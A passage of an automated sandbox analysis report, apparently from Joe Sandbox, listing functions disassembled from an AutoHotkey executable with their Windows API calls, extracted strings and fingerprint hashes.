                                      • Instruction ID: 23fa1a68358f32c2ed5662dae1137d882aef1398c8394b627f3fba7a5245f79c
                                      • Opcode Fuzzy Hash: 4a1e726e7df85e9ff3d7cbdd4e7c5b47b5fb186546a1bb74d1d9ee6d54b0ca72
                                      • Instruction Fuzzy Hash: 78312371642384EBEB60EF64EC857DA3B50E744714F44403FEA8592392C7B868C8CBAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00441610 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0044DE50: GetForegroundWindow.USER32(?,?,00440955,?), ref: 0044DE7E
                                        • Part of subcall function 0044DE50: IsWindowVisible.USER32(00000000), ref: 0044DE99
                                      • _wcsncpy.LIBCMT ref: 00441654
                                      • __wcstoi64.LIBCMT ref: 00441694
                                      • __fassign.LIBCMT ref: 004416E2
                                      • __fassign.LIBCMT ref: 0044170E
                                        • Part of subcall function 0049C2F2: __wtof_l.LIBCMT ref: 0049C2FC
                                        • Part of subcall function 0049A0CD: __fassign.LIBCMT ref: 0049A0C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __fassign$Window$ForegroundVisible__wcstoi64__wtof_l_wcsncpy
                                      • String ID: msctls_statusbar321
                                      • API String ID: 4167010027-1022929942
                                      • Opcode ID: 1850b5bf2c51372dc3d21f37f977ed31a05b2ccf45f104274231273493c8a9c0
                                      • Instruction ID: 3612487c545c82b754a06a0290c5a3c7eb0e7f97d9787525ecae4bac344d8f6a
                                      • Opcode Fuzzy Hash: 1850b5bf2c51372dc3d21f37f977ed31a05b2ccf45f104274231273493c8a9c0
                                      • Instruction Fuzzy Hash: 92310C71A0430157E220BB659C42B6B73D89F84354F09093FFA4A67293E67DD459C3AF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045F210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wsplitpath_wcschr
                                      • String ID: *
                                      • API String ID: 1241525681-163128923
                                      • Opcode ID: 03ee793d2e8993e68f2f19f30c3b8f20fcf703e06b1cba8c5d0c937425268f86
                                      • Instruction ID: dc218748ac8d62905a5ab9ae9b86ac5e6777fd464f6d87b3949d7a3e4e7bfbce
                                      • Opcode Fuzzy Hash: 03ee793d2e8993e68f2f19f30c3b8f20fcf703e06b1cba8c5d0c937425268f86
                                      • Instruction Fuzzy Hash: BB31E1B64443005AD730A741CC96BEBB3B8AF94305F04852BF98983281F6B8964CC797
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004120B4 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 89COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __swprintf
                                      • String ID: %i-%i$%s%s%s%s%s%s$(no)$OFF
                                      • API String ID: 1857805200-721635399
                                      • Opcode ID: 30464e71bbc3f95f33224fe4ecfa5a77af51fac2c056aecf65554370e7e85495
                                      • Instruction ID: 0765a37d7327b75a906568f873d9ed25e2cd0d355111d9572e56128918f6482d
                                      • Opcode Fuzzy Hash: 30464e71bbc3f95f33224fe4ecfa5a77af51fac2c056aecf65554370e7e85495
                                      • Instruction Fuzzy Hash: AF3144322043409BD738DE598940BFBB7F1AF85304F144A6FE596C7280E7B999A5C36A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,KbdLayerDescriptor), ref: 00419082
                                      • GetCurrentProcess.KERNEL32(?), ref: 0041909E
                                      • IsWow64Process.KERNEL32(00000000), ref: 004190A5
                                      • FreeLibrary.KERNEL32(00000000), ref: 004190CB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Process$AddressCurrentFreeLibraryProcWow64
                                      • String ID: KbdLayerDescriptor
                                      • API String ID: 2487901806-1890577838
                                      • Opcode ID: 2357dcb965203d69a1ba1cca60b76015f0115e306adc45fe8a51e47d8543f7e0
                                      • Instruction ID: 9e9f4822cbc9499381aebaba3a0c3162f0add3e78197b03a547cbe33c43ff55e
                                      • Opcode Fuzzy Hash: 2357dcb965203d69a1ba1cca60b76015f0115e306adc45fe8a51e47d8543f7e0
                                      • Instruction Fuzzy Hash: 6321F5716012249FD7248F25FC547ABBBA8E749718F15013FE882C3660EB399C91CA9D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0047C220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00008000,?,?,?,?,00434CA8,004B0CF8), ref: 0047C267
                                      • GetPrivateProfileStringW.KERNEL32(?,004B0CF8,ERROR,?,0000FFFF,?), ref: 0047C292
                                      • GetPrivateProfileSectionW.KERNEL32(?,?,0000FFFF,?), ref: 0047C2D6
                                      • GetPrivateProfileSectionNamesW.KERNEL32(?,0000FFFF,?), ref: 0047C2F0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$Section$FullNameNamesPathString
                                      • String ID: ERROR
                                      • API String ID: 4060383694-2861137601
                                      • Opcode ID: 7e7f457d83c164da8499af263ac0f87e1ac7278a8e470280884b5c4588e41642
                                      • Instruction ID: 5b0d26fef9fb3741154be4cf79f6475b6628ba0c5ca6af79c6648833fca067f3
                                      • Opcode Fuzzy Hash: 7e7f457d83c164da8499af263ac0f87e1ac7278a8e470280884b5c4588e41642
                                      • Instruction Fuzzy Hash: FD216031504305ABD735DB44C885FFBB3B9EF85700F00896EA189861D0E7B89989D76A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044E0F0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDateFormatW.KERNEL32(00000400,00000000,00000000,ddd,?,?), ref: 0044E16B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: DateFormat
                                      • String ID: MMM$MMMM$ddd$dddd
                                      • API String ID: 2793631785-2187213731
                                      • Opcode ID: edf4230115f300e6d0fbc5cc9f98aae906d60e5887cbf0af1c98635d19d987ab
                                      • Instruction ID: aeb4f1a9d8d4490a7fd5bf74330efad32b079092415b50c63ed18fd255cbc3fd
                                      • Opcode Fuzzy Hash: edf4230115f300e6d0fbc5cc9f98aae906d60e5887cbf0af1c98635d19d987ab
                                      • Instruction Fuzzy Hash: 8201D1B1B88611A6F7245A0ADC46B779296FB85711F18C227F8519A3C1C37CEC4181AF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00485270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(user32,IsHungAppWindow,?,0048420D), ref: 00485296
                                      • GetProcAddress.KERNEL32(00000000), ref: 0048529D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: IsHungAppWindow$user32
                                      • API String ID: 1646373207-934392274
                                      • Opcode ID: 1c47e967b3398c9dce536844779dfa577d466348b691985782fabfa249b1b805
                                      • Instruction ID: 3aba9b08236de5ed654823362906a440f37b5f449c11d7ce4275a92dd44ad3d8
                                      • Opcode Fuzzy Hash: 1c47e967b3398c9dce536844779dfa577d466348b691985782fabfa249b1b805
                                      • Instruction Fuzzy Hash: B8F0BB71696712AAEB115B746C06F5E3798AB01B01F25447FF403D55E0DF58C4409B5C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0049A782 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 0049A79C
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      • std::exception::exception.LIBCMT ref: 0049A7D1
                                      • std::exception::exception.LIBCMT ref: 0049A7EB
                                      • __CxxThrowException@8.LIBCMT ref: 0049A7FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                      • String ID: 4tM
                                      • API String ID: 615853336-2669483393
                                      • Opcode ID: c8bcd54b1c9fee24d6521b7071256cdf1934a5af02535721511bcc26ef9e2dff
                                      • Instruction ID: e13e35127ef9e70d3dff5ae51d32e76a730e3306eef67bd08b9586800c482c61
                                      • Opcode Fuzzy Hash: c8bcd54b1c9fee24d6521b7071256cdf1934a5af02535721511bcc26ef9e2dff
                                      • Instruction Fuzzy Hash: AFF0D1309402096ADF11EB55DC46AAE3FB9AF5071CB6000BFF814962A1DBBC8A1586CE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004050E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000002,00000000,004050AA,?,00000000,?,?,0041A42E,004B0CF8,004642C5,?,00000001,?), ref: 004050F1
                                      • GlobalLock.KERNEL32(00000000,?,?,0041A42E,004B0CF8,004642C5,?,00000001,?), ref: 00405116
                                      • GlobalFree.KERNEL32(00000000), ref: 00405127
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Global$AllocFreeLock
                                      • String ID: GlobalAlloc$GlobalLock
                                      • API String ID: 1811133220-3672399903
                                      • Opcode ID: 70b91be451777ed86922f46ff293be6905bc89da4934d29dccb5e03b56f421c3
                                      • Instruction ID: 9bfc458d229dd1d84222a0b95eb0bef5cc21c228c8fe386269b48dc9ef824c2f
                                      • Opcode Fuzzy Hash: 70b91be451777ed86922f46ff293be6905bc89da4934d29dccb5e03b56f421c3
                                      • Instruction Fuzzy Hash: 66F08170A40B019BC720AB758905A1777E9EF94709300887BA857C7790EB78D8008F1D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040E740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CloseHandle.KERNEL32(00000000,02C50FF8,?,?,00414911), ref: 0040E753
                                      • CreateMutexW.KERNEL32(00000000,00000000,AHK Keybd,02C50FF8,?,?,00414911), ref: 0040E75E
                                      • GetLastError.KERNEL32 ref: 0040E766
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E791
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CloseHandle$CreateErrorLastMutex
                                      • String ID: AHK Keybd
                                      • API String ID: 2372642624-4057427925
                                      • Opcode ID: 2e0d950e03243fa631d9cacbcec111292c8a91bd9719d91d0f5be31a91f2a9dc
                                      • Instruction ID: f3af930216dba3c32d2826a1fc649874deb868cf857af4cee206d493a2815e0b
                                      • Opcode Fuzzy Hash: 2e0d950e03243fa631d9cacbcec111292c8a91bd9719d91d0f5be31a91f2a9dc
                                      • Instruction Fuzzy Hash: 56F0A7B3B1232057DB206B75ED88B4B6B589B84B61F050437E505D72D0D77C8C40426C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040E7B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CloseHandle.KERNEL32(00000000,02C50FF8,?,?,0041491E), ref: 0040E7C3
                                      • CreateMutexW.KERNEL32(00000000,00000000,AHK Mouse,02C50FF8,?,?,0041491E), ref: 0040E7CE
                                      • GetLastError.KERNEL32 ref: 0040E7D6
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E801
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CloseHandle$CreateErrorLastMutex
                                      • String ID: AHK Mouse
                                      • API String ID: 2372642624-1022267635
                                      • Opcode ID: 7a34951013c0a61e00e3a3fa4bc317dada32b2efcea6c5033a87a54a16989156
                                      • Instruction ID: 39463d49a4088dd806c9e760a42763cd72a9b9d8de9409561af5fa091353bca1
                                      • Opcode Fuzzy Hash: 7a34951013c0a61e00e3a3fa4bc317dada32b2efcea6c5033a87a54a16989156
                                      • Instruction Fuzzy Hash: 6BF0A7B3B1132057DB206BB9ECC8B8A6B589B84B61F150837E505D72D4D77C8C80426C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004823A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryW.KERNEL32(uxtheme,-004D98C1,?,0043D0C0,?), ref: 004823AC
                                      • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 004823BE
                                      • FreeLibrary.KERNEL32(00000000), ref: 004823DC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadProc
                                      • String ID: SetWindowTheme$uxtheme
                                      • API String ID: 145871493-1369271589
                                      • Opcode ID: 9fdb9af0fecbaaf04de43fdf768352dccd8a002899cb3eb92d7604187643ccf4
                                      • Instruction ID: a9f685e356b3f31b4e9343c8a98a14d741d5dd4eddda3ddee52148d147569da1
                                      • Opcode Fuzzy Hash: 9fdb9af0fecbaaf04de43fdf768352dccd8a002899cb3eb92d7604187643ccf4
                                      • Instruction Fuzzy Hash: 22E08679B816112B82902B35AD09F9F3E559FC6B12715453AFC06D7240CBBCCC0682BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043684A Relevance: 7.8, APIs: 5, Instructions: 265COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID:
                                      • API String ID: 3832890014-0
                                      • Opcode ID: 4d8b73bdd61d8e2d0483357e57812dc946ec1654c0a04bc8a223a66773e346fd
                                      • Instruction ID: 68b2e2123b779f65d6a0961ec8a4b3e458778bcc01030d9c131b5de5733aeef2
                                      • Opcode Fuzzy Hash: 4d8b73bdd61d8e2d0483357e57812dc946ec1654c0a04bc8a223a66773e346fd
                                      • Instruction Fuzzy Hash: 77812A66A01223B6E71057119C12BB273919F09358F1AD077DD46EB3C2E66DFC42C7AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004161F0 Relevance: 7.7, APIs: 5, Instructions: 182COMMON
                                      Download Yara Rule
                                      APIs
                                      • CallNextHookEx.USER32(00000000,?,?,?), ref: 00416210
                                      • UnhookWindowsHookEx.USER32(00000000), ref: 0041624D
                                      • GetTickCount.KERNEL32 ref: 0041629C
                                      • GetTickCount.KERNEL32 ref: 004163DF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountHookTick$CallNextUnhookWindows
                                      • String ID:
                                      • API String ID: 2092930497-0
                                      • Opcode ID: b715e4d5fb4f8b78326e425589830abd0cf655e6d3a565b63121fb919309f234
                                      • Instruction ID: ccba0d24c59a3afc4a6b793f44427c6f14b52417a2a1b4b3a2272b88b855a2cd
                                      • Opcode Fuzzy Hash: b715e4d5fb4f8b78326e425589830abd0cf655e6d3a565b63121fb919309f234
                                      • Instruction Fuzzy Hash: 8E61EF705062118AD724DF29E8907B6B7E1FB54710F05887FE896C3351EB78E894CBAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004846A0 Relevance: 7.6, APIs: 5, Instructions: 141windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,0040F31B,004D8348,004B0CF8,00000000,00000000), ref: 004846E1
                                      • IsWindowVisible.USER32(00000000), ref: 004846F6
                                        • Part of subcall function 00485450: __wcsnicmp.LIBCMT ref: 00485514
                                        • Part of subcall function 00485450: __wcstoui64.LIBCMT ref: 00485593
                                      • IsWindow.USER32(004B0CF8), ref: 004847EC
                                        • Part of subcall function 00485360: IsWindowVisible.USER32(004B0CF8), ref: 00485361
                                      • GetWindowLongW.USER32(004B0CF8,000000F0), ref: 00484818
                                      • EnumWindows.USER32(00484920,00000002), ref: 0048486A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$Visible$EnumForegroundLongWindows__wcsnicmp__wcstoui64
                                      • String ID:
                                      • API String ID: 256079111-0
                                      • Opcode ID: eb470d08f536ee960caf0479229bc1bea4746805785ae4bc82e26e7c7608c190
                                      • Instruction ID: fab4234c97850387ccbfdd78dfa84d182b2f6d3e31ef76e0a1dc178efcc0eaa5
                                      • Opcode Fuzzy Hash: eb470d08f536ee960caf0479229bc1bea4746805785ae4bc82e26e7c7608c190
                                      • Instruction Fuzzy Hash: 9F5183759043D28ADB30BF6598801EFB7E4BBC6344F448D2FE98983340EB784944CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045A130 Relevance: 7.6, APIs: 5, Instructions: 120windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ImageList_GetIconSize.COMCTL32(?,?,?), ref: 0045A1BF
                                      • ImageList_AddMasked.COMCTL32(?,00000000), ref: 0045A222
                                      • DeleteObject.GDI32(00000000), ref: 0045A230
                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000), ref: 0045A245
                                      • DestroyIcon.USER32(00000000), ref: 0045A253
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
